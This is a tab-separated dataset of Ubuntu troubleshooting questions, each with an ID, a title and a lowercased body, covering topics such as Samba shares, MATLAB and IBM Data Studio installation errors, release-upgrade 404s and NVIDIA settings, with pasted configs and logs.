455685	running ibm data studio 4.1.01 on ubuntu 14.04	i 've successfully installed ibm data studio and its web console on ubuntu 14.04 , and the web console runs like a dream and i can connect to my db2 databases fine . however , when i try and run the data studio application ( eclipse ) and click on any of the tasks located in there , i get the following error message : jvm terminated . exit code=160 /opt/ibm/ds4.1.0.1//jdk/jre/bin/javaw -xquickstart -xms40m -xmx1024m -xgcpolicy : gencon -xscmx96m -xshareclasses : name=ibmsdp_ % u -xnolinenumbers -xx : maxpermsize=512m -jar /opt/ibm/ds4.1.0.1//plugins org.eclipse.equinox.launcher_1.3.0.v20120522-1813.jar -os linux -ws gtk -arch x86_64 -showsplash -launcher /opt/ibm/ds4.1.0.1/eclipse -name eclipse -- launcher.library /opt/ibm/ds4.1.0.1//plugins/org.eclipse.equinox.launcher.gtk.linux.x86_64_1.1.200.v20120913-144807/eclipse_1502.so -startup /opt/ibm/ds4.1.0.1//plugins/org.eclipse.equinox.launcher_1.3.0.v20120522-1813.jar -- launcher.overridevmargs -exitdata 550010 -install /opt/ibm/ds4.1.0.1 -product com.ibm.datastudio.consolidated.product.ide -vm /opt/ibm/ds4.1.0.1//jdk/jre/bin/javaw -vmargs -xquickstart -xms40m -xmx1024m -xgcpolicy : gencon -xscmx96m -xshareclasses : name=ibmsdp_ % u -xnolinenumbers -xx : maxpermsize=512m -jar /opt/ibm/ds4.1.0.1//plugins/org.eclipse.equinox.launcher_1.3.0.v20120522-1813.jar checked my java version and its 1.7.0_51 : java version `` 1.7.0_51 '' openjdk runtime environment ( icedtea 2.4.6 ) ( 7u51-2.4.6-1ubuntu4 ) openjdk 64-bit server vm ( build 24.51-b03 , mixed mode ) any ideas would be greatly appreciated : - )
455686	unable to get windows file sharing ( samba ) to work under ubuntu	i would like to set up an ubuntu machine , where i can store movies , series and music . i managed to get a working share running , setup to /srv/samba/share . i can access the share from my windows machine , but from my ubuntu machine it wo n't let me copy files to it . what i actually want to achieve is to share on of the server 's hds , so i can copy , edit and view files from both windows and my xbmc raspberry pi . i 've edited the samba config file as below : # # sample configuration file for the samba suite for debian gnu/linux . # # # this is the main samba configuration file . you should read the # smb.conf ( 5 ) manual page in order to understand the options listed # here . samba has a huge number of configurable options most of which # are not shown in this example # # some options that are often worth tuning have been included as # commented-out examples in this file . # - when such options are commented with `` ; '' , the proposed setting # differs from the default samba behaviour # - when commented with `` # '' , the proposed setting is the default # behaviour of samba but the option is considered important # enough to be mentioned here # # note : whenever you modify this file you should run the command # `` testparm '' to check that you have not made any basic syntactic # errors . # ======================= global settings ======================= [ global ] # # browsing/identification # # # # change this to the workgroup/nt-domain name your samba server will part of workgroup = mccabehouse # server string is the equivalent of the nt description field server string = % h server ( samba , ubuntu ) # windows internet name serving support section : # wins support - tells the nmbd component of samba to enable its wins server # wins support = yes # wins server - tells the nmbd components of samba to be a wins client # note : samba can be either a wins server , or a wins client , but not both ; wins server = w.x.y.z # this will prevent nmbd to search for netbios names through dns . dns proxy = no # # # # networking # # # # # the specific set of interfaces / networks to bind to # this can be either the interface name or an ip address/netmask ; # interface names are normally preferred ; interfaces = 127.0.0.0/8 eth0 # only bind to the named interfaces and/or networks ; you must use the # 'interfaces ' option above to use this . # it is recommended that you enable this feature if your samba machine is # not protected by a firewall or is a firewall itself . however , this # option can not handle dynamic or non-broadcast interfaces correctly . ; bind interfaces only = yes # # # # debugging/accounting # # # # # this tells samba to use a separate log file for each machine # that connects log file = /var/log/samba/log. % m # cap the size of the individual log files ( in kib ) . max log size = 1000 # if you want samba to only log through syslog then set the following # parameter to 'yes ' . # syslog only = no # we want samba to log a minimum amount of information to syslog . everything # should go to /var/log/samba/log . { smbd , nmbd } instead . if you want to log # through syslog you should set the following parameter to something higher . syslog = 0 # do something sensible when samba crashes : mail the admin a backtrace panic action = /usr/share/samba/panic-action % d # # # # # # # authentication # # # # # # # # server role . defines in which mode samba will operate . possible # values are `` standalone server '' , `` member server '' , `` classic primary # domain controller '' , `` classic backup domain controller '' , `` active # directory domain controller '' . # # most people will want `` standalone sever '' or `` member server '' . # running as `` active directory domain controller '' will require first # running `` samba-tool domain provision '' to wipe databases and create a # new domain . server role = standalone server # if you are using encrypted passwords , samba will need to know what # password database type you are using . passdb backend = tdbsam obey pam restrictions = yes # this boolean parameter controls whether samba attempts to sync the unix # password with the smb password when the encrypted smb password in the # passdb is changed . unix password sync = yes # for unix password sync to work on a debian gnu/linux system , the following # parameters must be set ( thanks to ian kahan < < kahan @ informatik.tu-muenchen.de > for # sending the correct chat script for the passwd program in debian sarge ) . passwd program = /usr/bin/passwd % u passwd chat = *enter\snew\s*\spassword : * % n\n *retype\snew\s*\spassword : * % n\n *password\supdated\ssuccessfully* . # this boolean controls whether pam will be used for password changes # when requested by an smb client instead of the program listed in # 'passwd program ' . the default is 'no ' . pam password change = yes # this option controls how unsuccessful authentication attempts are mapped # to anonymous connections map to guest = bad user # # # # # # # # # # domains # # # # # # # # # # # # # the following settings only takes effect if 'server role = primary # classic domain controller ' , 'server role = backup domain controller' # or 'domain logons ' is set # # it specifies the location of the user's # profile directory from the client point of view ) the following # required a [ profiles ] share to be setup on the samba server ( see # below ) ; logon path = \\ % n\profiles\ % u # another common choice is storing the profile in the user 's home directory # ( this is samba 's default ) # logon path = \\ % n\ % u\profile # the following setting only takes effect if 'domain logons ' is set # it specifies the location of a user 's home directory ( from the client # point of view ) ; logon drive = h : # logon home = \\ % n\ % u # the following setting only takes effect if 'domain logons ' is set # it specifies the script to run during logon . the script must be stored # in the [ netlogon ] share # note : must be store in 'dos ' file format convention ; logon script = logon.cmd # this allows unix users to be created on the domain controller via the samr # rpc pipe . the example command creates a user account with a disabled unix # password ; please adapt to your needs ; add user script = /usr/sbin/adduser -- quiet -- disabled-password -- gecos `` '' % u # this allows machine accounts to be created on the domain controller via the # samr rpc pipe . # the following assumes a `` machines '' group exists on the system ; add machine script = /usr/sbin/useradd -g machines -c `` % u machine account '' -d /var/lib/samba -s /bin/false % u # this allows unix groups to be created on the domain controller via the samr # rpc pipe . ; add group script = /usr/sbin/addgroup -- force-badname % g # # # # # # # # # # # # misc # # # # # # # # # # # # # using the following line enables you to customise your configuration # on a per machine basis . the % m gets replaced with the netbios name # of the machine that is connecting ; include = /home/samba/etc/smb.conf. % m # some defaults for winbind ( make sure you 're not using the ranges # for something else . ) ; idmap uid = 10000-20000 ; idmap gid = 10000-20000 ; template shell = /bin/bash # setup usershare options to enable non-root users to share folders # with the net usershare command . # maximum number of usershare . 0 ( default ) means that usershare is disabled . ; usershare max shares = 100 # allow users who 've been granted usershare privileges to create # public shares , not just authenticated ones usershare allow guests = yes # ======================= share definitions ======================= # un-comment the following ( and tweak the other settings below to suit ) # to enable the default home directory shares . this will share each # user 's home directory as \\server\username ; [ homes ] ; comment = home directories ; browseable = yes # by default , the home directories are exported read-only . change the # next parameter to 'no ' if you want to be able to write to them . ; read only = yes # file creation mask is set to 0700 for security reasons . if you want to # create files with group=rw permissions , set next parameter to 0775. ; create mask = 0700 # directory creation mask is set to 0700 for security reasons . if you want to # create dirs . with group=rw permissions , set next parameter to 0775. ; directory mask = 0700 # by default , \\server\username shares can be connected to by anyone # with access to the samba server . # un-comment the following parameter to make sure that only `` username '' # can connect to \\server\username # this might need tweaking when using external authentication schemes ; valid users = % s # un-comment the following and create the netlogon directory for domain logons # ( you need to configure samba to act as a domain controller too . ) ; [ netlogon ] ; comment = network logon service ; path = /home/samba/netlogon ; guest ok = yes ; read only = yes # un-comment the following and create the profiles directory to store # users profiles ( see the `` logon path '' option above ) # ( you need to configure samba to act as a domain controller too . ) # the path below should be writable by all users so that their # profile directory may be created the first time they log on ; [ profiles ] ; comment = users profiles ; path = /home/samba/profiles ; guest ok = yes ; browseable = yes ; create mask = 0600 ; directory mask = 0700 [ printers ] comment = all printers browseable = no path = /var/spool/samba printable = yes guest ok = no read only = yes create mask = 0700 # windows clients look for this share name as a source of downloadable # printer drivers [ print $ ] comment = printer drivers path = /var/lib/samba/printers browseable = yes read only = yes guest ok = no # uncomment to allow remote administration of windows print drivers . # you may need to replace 'lpadmin ' with the name of the group your # admin users are members of . # please note that you also need to set appropriate unix permissions # to the drivers directory for these users to have write rights in it ; write list = root , @ lpadmin [ share ] comment = ubuntu file server share path = /srv/samba/share browsable = yes guest ok = yes read only = no create mask = 0755 [ share2 ] comment = ubuntu file server share path = /media/justin/3686d0d186d092ab browsable = yes guest ok = yes read only = no create mask = 0755 however , whenever i try to open the share from my pi or windows machine , it says i do n't have permission to access the files .
455687	how to run cpufreqd in ubuntu 14.04 ?	i 've just installed cpufreqd in a fresh installation of ubuntu 14.04 through : sudo apt-get install cpufreqd after that , i tried to execute it by sudo cpufreqd . but nothing happens ( neither error or indicator displayed ) . even i ca n't see any new process in the system monitor . then i installed cpufrequtils through sudo apt-get install cpufrequtils and i tried again to execute sudo cpufreqd with the same ( no ) result . i know there exist indicator-cpufreq , i was using it for some time ; but i realized that i need something more configurable and complete like cpufreqd . similar alternatives to this are welcome .
455689	matlab installantion error on ubuntu 14.04 lts	each time i try to install matlab using this command muhammad @ muhammad-inspiron-n5050 : ~/applications/matlab/forubuntu $ ./install it displays and close the installation box for the command ls -l /usr/lib/x86_64-linux-gnu/gio/modules/libgiolibproxy.so command . – ls : can not access command . : no such file or directory ls : can not access – : no such file or directory -rw-r -- r -- 1 root root 10424 مارچ 27 23:05 /usr/lib/x86_64-linux-gnu/gio/modules/libgiolibproxy.so preparing installation files ... - > dvd = /home/muhammad/applications/matlab/forubuntu - > arch = glnxa64 - > display = :0 - > testonly = 0 - > jre_loc = /tmp/mathworks_8893/sys/java/jre/glnxa64/jre - > ld_library_path = /tmp/mathworks_8893/bin/glnxa64 command to run : /tmp/mathworks_8893/sys/java/jre/glnxa64/jre/bin/java -xmx512m -splash : '' /home/muhammad/applications/matlab/forubuntu/java/splash.png '' -djava.ext.dirs=/tmp/mathworks_8893/sys/java/jre/glnxa64/jre/lib/ext : /tmp/mathworks_8893/java/jar : /tmp/mathworks_8893/java/jar/ja_jp/ : /tmp/mathworks_8893/java/jar/zh_cn/ : /tmp/mathworks_8893/java/jarext : /tmp/mathworks_8893/java/jarext/axis2/ : /tmp/mathworks_8893/java/jarext/guice/ : /tmp/mathworks_8893/java/jarext/webservices/ com/mathworks/professionalinstaller/launcher -root `` /home/muhammad/applications/matlab/forubuntu '' -tmpdir `` /tmp/mathworks_8893 '' installing ... /tmp/mathworks_8893/bin/glnxa64/libstdc++.so.6 : file too short failed to load module : /usr/lib/x86_64-linux-gnu/gio/modules/libgiolibproxy.so exception in thread `` main '' com.google.inject.provisionexception : guice provision errors : 1 ) error in custom provider , java.lang.runtimeexception : java.lang.reflect.invocationtargetexception at com.mathworks.wizard.wizardmodule.providedisplayproperties ( wizardmodule.java:68 ) while locating com.mathworks.instutil.displayproperties at com.mathworks.wizard.ui.components.componentsmodule.providepaintstrategy ( componentsmodule.java:76 ) while locating com.mathworks.wizard.ui.components.paintstrategy for parameter 4 at com.mathworks.wizard.ui.components.swingcomponentfactoryimpl. < init > ( swingcomponentfactoryimpl.java:111 ) while locating com.mathworks.wizard.ui.components.swingcomponentfactoryimpl while locating com.mathworks.wizard.ui.components.swingcomponentfactory for parameter 1 at com.mathworks.wizard.ui.wizarduiimpl. < init > ( wizarduiimpl.java:62 ) while locating com.mathworks.wizard.ui.wizarduiimpl while locating com.mathworks.wizard.ui.wizardui annotated with @ com.google.inject.name.named ( value=basewizardui ) at com.mathworks.wizard.ui.uimodule.providewizardui ( uimodule.java:50 ) while locating com.mathworks.wizard.ui.wizardui for parameter 0 at com.mathworks.wizard.exceptionhandlerimpl. < init > ( exceptionhandlerimpl.java:22 ) while locating com.mathworks.wizard.exceptionhandlerimpl while locating com.mathworks.wizard.exceptionhandler 1 error at com.google.inject.injectorimpl $ 4.get ( injectorimpl.java:767 ) at com.google.inject.injectorimpl.getinstance ( injectorimpl.java:793 ) at com.mathworks.wizard.wizardlauncher.startwizard ( wizardlauncher.java:156 ) at com.mathworks.wizard.wizardlauncher.start ( wizardlauncher.java:71 ) at com.mathworks.wizard.abstractlauncher.launch ( abstractlauncher.java:27 ) at com.mathworks.wizard.abstractlauncher.launchstandalone ( abstractlauncher.java:18 ) at com.mathworks.professionalinstaller.launcher.main ( launcher.java:21 ) caused by : java.lang.runtimeexception : java.lang.reflect.invocationtargetexception at com.google.inject.internal.providermethod.get ( providermethod.java:106 ) at com.google.inject.internalfactorytoprovideradapter.get ( internalfactorytoprovideradapter.java:48 ) at com.google.inject.injectorimpl $ 4 $ 1.call ( injectorimpl.java:758 ) at com.google.inject.injectorimpl.callincontext ( injectorimpl.java:811 ) at com.google.inject.injectorimpl $ 4.get ( injectorimpl.java:754 ) at com.google.inject.spi.providerlookup $ 1.get ( providerlookup.java:89 ) at com.google.inject.spi.providerlookup $ 1.get ( providerlookup.java:89 ) at com.google.inject.internal.providermethod.get ( providermethod.java:95 ) at com.google.inject.internalfactorytoprovideradapter.get ( internalfactorytoprovideradapter.java:48 ) at com.google.inject.singleparameterinjector.inject ( singleparameterinjector.java:42 ) at com.google.inject.singleparameterinjector.getall ( singleparameterinjector.java:66 ) at com.google.inject.constructorinjector.construct ( constructorinjector.java:84 ) at com.google.inject.constructorbindingimpl $ factory.get ( constructorbindingimpl.java:111 ) at com.google.inject.factoryproxy.get ( factoryproxy.java:56 ) at com.google.inject.singleparameterinjector.inject ( singleparameterinjector.java:42 ) at com.google.inject.singleparameterinjector.getall ( singleparameterinjector.java:66 ) at com.google.inject.constructorinjector.construct ( constructorinjector.java:84 ) at com.google.inject.constructorbindingimpl $ factory.get ( constructorbindingimpl.java:111 ) at com.google.inject.factoryproxy.get ( factoryproxy.java:56 ) at com.google.inject.providertointernalfactoryadapter $ 1.call ( providertointernalfactoryadapter.java:45 ) at com.google.inject.injectorimpl.callincontext ( injectorimpl.java:811 ) at com.google.inject.providertointernalfactoryadapter.get ( providertointernalfactoryadapter.java:42 ) at com.google.inject.scopes $ 1 $ 1.get ( scopes.java:54 ) at com.google.inject.internalfactorytoprovideradapter.get ( internalfactorytoprovideradapter.java:48 ) at com.google.inject.injectorimpl $ 4 $ 1.call ( injectorimpl.java:758 ) at com.google.inject.injectorimpl.callincontext ( injectorimpl.java:811 ) at com.google.inject.injectorimpl $ 4.get ( injectorimpl.java:754 ) at com.google.inject.spi.providerlookup $ 1.get ( providerlookup.java:89 ) at com.google.inject.spi.providerlookup $ 1.get ( providerlookup.java:89 ) at com.google.inject.internal.providermethod.get ( providermethod.java:95 ) at com.google.inject.internalfactorytoprovideradapter.get ( internalfactorytoprovideradapter.java:48 ) at com.google.inject.providertointernalfactoryadapter $ 1.call ( providertointernalfactoryadapter.java:45 ) at com.google.inject.injectorimpl.callincontext ( injectorimpl.java:811 ) at com.google.inject.providertointernalfactoryadapter.get ( providertointernalfactoryadapter.java:42 ) at com.google.inject.scopes $ 1 $ 1.get ( scopes.java:54 ) at com.google.inject.internalfactorytoprovideradapter.get ( internalfactorytoprovideradapter.java:48 ) at com.google.inject.singleparameterinjector.inject ( singleparameterinjector.java:42 ) at com.google.inject.singleparameterinjector.getall ( singleparameterinjector.java:66 ) at com.google.inject.constructorinjector.construct ( constructorinjector.java:84 ) at com.google.inject.constructorbindingimpl $ factory.get ( constructorbindingimpl.java:111 ) at com.google.inject.factoryproxy.get ( factoryproxy.java:56 ) at com.google.inject.providertointernalfactoryadapter $ 1.call ( providertointernalfactoryadapter.java:45 ) at com.google.inject.injectorimpl.callincontext ( injectorimpl.java:811 ) at com.google.inject.providertointernalfactoryadapter.get ( providertointernalfactoryadapter.java:42 ) at com.google.inject.scopes $ 1 $ 1.get ( scopes.java:54 ) at com.google.inject.internalfactorytoprovideradapter.get ( internalfactorytoprovideradapter.java:48 ) at com.google.inject.injectorimpl $ 4 $ 1.call ( injectorimpl.java:758 ) at com.google.inject.injectorimpl.callincontext ( injectorimpl.java:804 ) at com.google.inject.injectorimpl $ 4.get ( injectorimpl.java:754 ) ... 6 more caused by : java.lang.reflect.invocationtargetexception at sun.reflect.nativemethodaccessorimpl.invoke0 ( native method ) at sun.reflect.nativemethodaccessorimpl.invoke ( unknown source ) at sun.reflect.delegatingmethodaccessorimpl.invoke ( unknown source ) at java.lang.reflect.method.invoke ( unknown source ) at com.google.inject.internal.providermethod.get ( providermethod.java:101 ) ... 54 more caused by : com.mathworks.instutil.jniexception : java.lang.unsatisfiedlinkerror : /tmp/mathworks_8893/bin/glnxa64/libinstutil.so : /tmp/mathworks_8893/bin/glnxa64/libstdc++.so.6 : file too short at com.mathworks.instutil.nativeutility.loadnativelibrary ( nativeutility.java:39 ) at com.mathworks.instutil.nativeutility. < init > ( nativeutility.java:24 ) at com.mathworks.instutil.displaypropertiesimpl. < init > ( displaypropertiesimpl.java:10 ) at com.mathworks.wizard.wizardmodule.providedisplayproperties ( wizardmodule.java:75 ) ... 59 more caused by : java.lang.unsatisfiedlinkerror : /tmp/mathworks_8893/bin/glnxa64/libinstutil.so : /tmp/mathworks_8893/bin/glnxa64/libstdc++.so.6 : file too short at java.lang.classloader $ nativelibrary.load ( native method ) at java.lang.classloader.loadlibrary0 ( unknown source ) at java.lang.classloader.loadlibrary ( unknown source ) at java.lang.runtime.load0 ( unknown source ) at java.lang.system.load ( unknown source ) at com.mathworks.instutil.nativeutility.loadnativelibrary ( nativeutility.java:37 )
455690	enquiry about 64 bit ubuntu for x86 64 ( intel 64 bit ) computers ?	the new ubuntu ( ubuntu 14.04 lts ) dont have a 64 bit desktop release for intel computers ? 64 bit is only for amd ? i dont see x86_64 in the following link , please clarify . http : //releases.ubuntu.com/14.04/
455696	wifi switch stop working , no gui loggin ubuntu 14.4	after i try to reinstall ubuntu software center and upgrade apt-get suddenly wifi turn off and after restart and can not access gui and just access desktop with text mode ?
455699	how to increase or decrease brightness in the login screen when running within virtualbox ?	i ca n't able to increase or decrease screen brightness on the login screen . is that possible to change brightness on login screen ?
455703	question about subtitles in movies	i download a 720p movie like every time i do but the difference that all of them downloaded with subtitles in them no need to download subtitle files except 1 movie needs a subtitles file , so i downloaded one and ended when i added it by appearing of some strange symbols in the video ! how to fix that knowing that the subs are in arabic . is that a bug in ubuntu or what ! ! does ubuntu contain arabic fonts pack ? if not how to get them because i am tired of searching .
455707	in ubuntu 14/04 , ibus does n't work with unity webapps	i just started using ubuntu 14.04 64bit and touch unity web app . i found an issue : i open an unity webapp like unity-webapps-amazon or unity-webapps-telegram , i ca n't input any chinese word by ibus in it . ibus input method does n't work in unity webapp . so i wan na know how to fix this . thanks additionalďź i found i ca n't also input chinese word in ubuntu web browser by ibus , so i think this is bug of ubuntu web browser . and i submitted an bug report in launchpad .
455715	libopenscenegraph80 error on ubuntu trusty partial upgrade	i have recently upgraded to ubuntu 14.04 lts and today it asked to do a partial upgrade which i did . it came up with and error : i tried to install the package but the problem still occurs . the output to command sudo apt-get install libopenscenegraph80 is as follows : reading package lists ... done building dependency tree reading state information ... done the following extra packages will be installed : libopenscenegraph80 0 to upgrade , 0 to newly install , 0 to remove and 52 not to upgrade . there does not seem to be any package information for libopenscenegraph80 under trusty package system.the latest version is for saucy . is this an error that i can avoid or ignore without major consequences ?
455717	ubuntu 14.04 nvidia-settings is empty	i installed nvidia driver 331-updates from the additional drivers tab but after open the nvidia-settings there are only two options ( application profiles and nvidia-settings configuration same as in this picture : try to run sudo nvidia-xconfig in the terminal but says command not found . i also checked my xconfig file and it is empty , so possibly i should have to create it , but i ca n't . does anyone have any solution ?
455723	i have a lot of 404 error when i try to do `do-release-upgrade`	i am trying to upgrade my version of ubuntu . i have ubuntu 13.04 and when i do sudo do-release-upgrade i have this trace : sudo do-release-upgrade recherche d'une nouvelle version d'ubuntu votre version d'ubuntu n'est plus prise en charge . pour plus d'informations sur la mise à jour , veuillez visiter : http : //www.ubuntu.com/releaseendoflife prendre :1 signature de l'outil de mise à niveau [ 198 b ] prendre :2 outil de mise à niveau [ 1 134 kb ] 1 134 k o téléchargés en 0s ( 0 o/s ) authentification de 'saucy.tar.gz ' avec 'saucy.tar.gz.gpg' extraction de 'saucy.tar.gz' lecture du cache vérification du gestionnaire de paquets lecture des listes de paquets… terminé construction de l'arbre des dépendances lecture des informations d'état… terminé construction des structures de données… terminé att http : //archive.ubuntu.com saucy release.gpg att http : //extras.ubuntu.com saucy release.gpg att http : //archive.canonical.com saucy release.gpg att http : //security.ubuntu.com saucy-security release.gpg att http : //archive.ubuntu.com saucy release att http : //security.ubuntu.com saucy-security release att http : //extras.ubuntu.com saucy release ign http : //archive.canonical.com saucy-updates release.gpg att http : //archive.ubuntu.com saucy/main amd64 packages att http : //security.ubuntu.com saucy-security/main amd64 packages att http : //extras.ubuntu.com saucy/main sources ign http : //archive.canonical.com saucy-backports release.gpg att http : //archive.ubuntu.com saucy/universe amd64 packages att http : //security.ubuntu.com saucy-security/restricted amd64 packages att http : //extras.ubuntu.com saucy/main amd64 packages att http : //archive.canonical.com saucy release.gpg att http : //archive.ubuntu.com saucy/restricted amd64 packages att http : //security.ubuntu.com saucy-security/universe amd64 packages att http : //extras.ubuntu.com saucy/main i386 packages att http : //archive.canonical.com saucy release att http : //archive.ubuntu.com saucy/multiverse amd64 packages att http : //security.ubuntu.com saucy-security/multiverse amd64 packages ign http : //archive.canonical.com saucy-updates release err http : //extras.ubuntu.com saucy/main translation-fr_ca att http : //archive.ubuntu.com saucy/main i386 packages att http : //security.ubuntu.com saucy-security/main i386 packages ign http : //archive.canonical.com saucy-backports release err http : //extras.ubuntu.com saucy/main translation-fr att http : //archive.ubuntu.com saucy/universe i386 packages att http : //security.ubuntu.com saucy-security/restricted i386 packages att http : //archive.canonical.com saucy release err http : //extras.ubuntu.com saucy/main translation-en att http : //archive.ubuntu.com saucy/restricted i386 packages att http : //security.ubuntu.com saucy-security/universe i386 packages err http : //archive.canonical.com saucy-updates/main sources err http : //extras.ubuntu.com saucy/main translation-en_us att http : //archive.ubuntu.com saucy/multiverse i386 packages att http : //security.ubuntu.com saucy-security/multiverse i386 packages err http : //archive.canonical.com saucy-updates/restricted sources err http : //extras.ubuntu.com saucy/main translation-fr_ca err http : //archive.ubuntu.com saucy/main translation-fr_ca err http : //security.ubuntu.com saucy-security/main translation-fr_ca err http : //extras.ubuntu.com saucy/main translation-fr err http : //archive.canonical.com saucy-updates/universe sources att http : //archive.ubuntu.com saucy/main translation-fr att http : //archive.ubuntu.com saucy/main translation-en err http : //extras.ubuntu.com saucy/main translation-en err http : //archive.canonical.com saucy-updates/multiverse sources err http : //security.ubuntu.com saucy-security/main translation-fr err http : //archive.ubuntu.com saucy/main translation-en_us att http : //security.ubuntu.com saucy-security/main translation-en err http : //archive.canonical.com saucy-updates/main amd64 packages err http : //extras.ubuntu.com saucy/main translation-en_us err http : //archive.ubuntu.com saucy/multiverse translation-fr_ca err http : //security.ubuntu.com saucy-security/main translation-en_us err http : //extras.ubuntu.com saucy/main translation-fr_ca err http : //archive.canonical.com saucy-updates/restricted amd64 packages att http : //archive.ubuntu.com saucy/multiverse translation-fr err http : //security.ubuntu.com saucy-security/multiverse translation-fr_ca err http : //extras.ubuntu.com saucy/main translation-fr err http : //archive.canonical.com saucy-updates/universe amd64 packages att http : //archive.ubuntu.com saucy/multiverse translation-en err http : //security.ubuntu.com saucy-security/multiverse translation-fr err http : //extras.ubuntu.com saucy/main translation-en err http : //archive.canonical.com saucy-updates/multiverse amd64 packages err http : //archive.ubuntu.com saucy/multiverse translation-en_us att http : //security.ubuntu.com saucy-security/multiverse translation-en err http : //archive.canonical.com saucy-updates/main i386 packages err http : //extras.ubuntu.com saucy/main translation-en_us err http : //archive.ubuntu.com saucy/restricted translation-fr_ca err http : //security.ubuntu.com saucy-security/multiverse translation-en_us err http : //extras.ubuntu.com saucy/main translation-fr_ca err http : //archive.canonical.com saucy-updates/restricted i386 packages att http : //archive.ubuntu.com saucy/restricted translation-fr err http : //security.ubuntu.com saucy-security/restricted translation-fr_ca err http : //extras.ubuntu.com saucy/main translation-fr err http : //archive.canonical.com saucy-updates/universe i386 packages att http : //archive.ubuntu.com saucy/restricted translation-en err http : //archive.ubuntu.com saucy/restricted translation-en_us err http : //security.ubuntu.com saucy-security/restricted translation-fr err http : //archive.canonical.com saucy-updates/multiverse i386 packages err http : //extras.ubuntu.com saucy/main translation-en err http : //archive.ubuntu.com saucy/universe translation-fr_ca att http : //security.ubuntu.com saucy-security/restricted translation-en err http : //archive.canonical.com saucy-updates/main translation-fr_ca err http : //extras.ubuntu.com saucy/main translation-en_us att http : //archive.ubuntu.com saucy/universe translation-fr ign http : //extras.ubuntu.com saucy/main translation-fr_ca err http : //archive.canonical.com saucy-updates/main translation-fr err http : //security.ubuntu.com saucy-security/restricted translation-en_us att http : //archive.ubuntu.com saucy/universe translation-en ign http : //extras.ubuntu.com saucy/main translation-fr err http : //security.ubuntu.com saucy-security/universe translation-fr_ca err http : //archive.canonical.com saucy-updates/main translation-en err http : //archive.ubuntu.com saucy/universe translation-en_us err http : //security.ubuntu.com saucy-security/universe translation-fr ign http : //extras.ubuntu.com saucy/main translation-en err http : //archive.canonical.com saucy-updates/main translation-en_us err http : //archive.ubuntu.com saucy/main translation-fr_ca att http : //security.ubuntu.com saucy-security/universe translation-en err http : //archive.canonical.com saucy-updates/multiverse translation-fr_ca ign http : //extras.ubuntu.com saucy/main translation-en_us err http : //archive.ubuntu.com saucy/main translation-en_us err http : //archive.canonical.com saucy-updates/multiverse translation-fr err http : //security.ubuntu.com saucy-security/universe translation-en_us i have a ton of error messages and some 404 errors . this is my /etc/apt/sources.list : # deb cdrom : [ ubuntu 13.04 _saucy ringtail_ - release amd64 ( 20130424 ) ] / saucy main restricted # see http : //help.ubuntu.com/community/upgradenotes for how to upgrade to # newer versions of the distribution . deb http : //archive.canonical.com/ubuntu/ saucy main restricted deb-src http : //archive.canonical.com/ubuntu/ saucy main restricted # # major bug fix updates produced after the final release of the # # distribution . deb http : //archive.canonical.com/ubuntu/ saucy-updates main restricted deb-src http : //archive.canonical.com/ubuntu/ saucy-updates main restricted # # n.b . software from this repository is entirely unsupported by the ubuntu # # team . also , please note that software in universe will not receive any # # review or updates from the ubuntu security team . deb http : //archive.canonical.com/ubuntu/ saucy universe deb-src http : //archive.canonical.com/ubuntu/ saucy universe deb http : //archive.canonical.com/ubuntu/ saucy-updates universe deb-src http : //archive.canonical.com/ubuntu/ saucy-updates universe # # n.b . software from this repository is entirely unsupported by the ubuntu # # team , and may not be under a free licence . please satisfy yourself as to # # your rights to use the software . also , please note that software in # # multiverse will not receive any review or updates from the ubuntu # # security team . deb http : //archive.canonical.com/ubuntu/ saucy multiverse deb-src http : //archive.canonical.com/ubuntu/ saucy multiverse deb http : //archive.canonical.com/ubuntu/ saucy-updates multiverse deb-src http : //archive.canonical.com/ubuntu/ saucy-updates multiverse # # n.b . software from this repository may not have been tested as # # extensively as that contained in the main release , although it includes # # newer versions of some applications which may provide useful features . # # also , please note that software in backports will not receive any review # # or updates from the ubuntu security team . deb http : //archive.canonical.com/ubuntu/ saucy-backports main restricted universe multiverse deb-src http : //archive.canonical.com/ubuntu/ saucy-backports main restricted universe multiverse deb http : //security.ubuntu.com/ubuntu saucy-security main restricted deb http : //security.ubuntu.com/ubuntu saucy-security universe deb http : //security.ubuntu.com/ubuntu saucy-security multiverse # # uncomment the following two lines to add software from canonical's # # 'partner ' repository . # # this software is not part of ubuntu , but is offered by canonical and the # # respective vendors as a service to ubuntu users . # deb http : //archive.canonical.com/ubuntu saucy partner # deb-src http : //archive.canonical.com/ubuntu saucy partner # # this software is not part of ubuntu , but is offered by third-party # # developers who want to ship their latest software . deb http : //extras.ubuntu.com/ubuntu saucy main deb-src http : //extras.ubuntu.com/ubuntu saucy main deb http : //archive.canonical.com/ saucy partner # deb-src http : //archive.canonical.com/ saucy partner # deb-src http : //archive.canonical.com/ saucy partner # deb http : //liveusb.info/multisystem/depot all main # désactivé pour la mise à niveau vers saucy # deb-src http : //liveusb.info/multisystem/depot all main deb http : //archive.ubuntu.com/ubuntu saucy main universe restricted multiverse what can i do to correct my pathes ?
455724	ubuntu wont boot ( only blank screen ) after upgrading to 14.04	upgrade manager suggested me to upgrade my ubuntu to 14.04 . all went good but after restart ubuntu cant boot . only black screen appears and i dont know what can i do with it ... i cant even access grub ( shift key deosnt work , it print only word `` grub '' on screen , ctrl+alt+f1 doenst work too ) . i had some work on hdd so i really need to fix it as soon as possible . if you can help me i will be really thankful .
455726	every video in fast forward motion 14.04	no sound just fast playing video it does n't matter which ever player or browser i use . while checking in system monitor pulseaudio in very high priority . i tried to uninstall and re-install pulse audio but nothing changes.. stopped all the plugins in browser nothing happended . one observation was that while playing video in youtube when i ended the pulseaudio process using system monitor the video became normal but no audio ... .
455735	replace xubuntu default login screen with mate login	i installed mate desktop enviroment to my xubuntu 14.04 . i find it better , so i would like to use it as my default enviroment . but i do n't know how to replace default xfce login screen with mate . can you help me pls ?
455736	remove ifupdown ( eth0 ) connection	while i was installing ubuntu 14.04 i had some issues with graphic card drivers so i needed to install drivers from root , i created adsl connection using pppoeconf . now when i boot up my pc i have two connections , my regular connection which i use and ifupdown ( eth0 ) which was created using pppoeconf . how can i delete eth0 connection so it does n't bothers me anymore ?
455739	how to install luidia ebeam software	i have downloaded from luidia , the ebeam interactive software for linux . the filename is `` ebeamscrapbook_linux_ubuntu_1_0_0.tgz . i am running ubuntu 12.04 . how can i install it ?
